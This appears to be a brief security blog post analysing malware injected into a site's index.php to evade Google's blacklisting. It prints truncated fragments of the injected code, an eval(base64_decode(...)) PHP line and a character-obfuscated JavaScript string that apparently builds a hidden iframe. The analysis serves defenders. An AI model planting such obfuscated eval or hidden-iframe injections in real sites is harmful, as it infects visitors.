Google is getting pretty good at detecting web-based malware and blacklisting the sites that are hosting it. This means bad business for the attackers (or “hackers”, as the media like the call them) and as a result they are already changing their tactics to hide from Google.
Why is this bad business for the malware writers? Well, if a site gets blacklisted, less users will visit it and less people will load their malware and get infected. Good for everyone else, bad for them.
Anyway, yesterday we were analyzing a malware that added the following code to the index.php of a site:
:< ?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCc…
long long long line.. ? >
After we decode it, we got a code that looked like:
return base64_decode(“PHNjcmlwdD5.. ..KS5qb2luKCIiKSk7PC9zY3JpcHQ+”);
var bpxDsSbm8=’d*%@o*%@c*%@u*%@%@a*%@.. %@t*%@p*%@:*%@/*%@/*%@n*%@i*%@n*%@o*
%@”*%@ *%@w*%@i*%@d*%@t*%@h*%@=*%@2*%@.. *%@h*%@e*%@i*%@g*%@h*%@t*%@=*%@2*%@
If that becomes a trend, Google will have to stop using their user agent/common IP address for the malware check.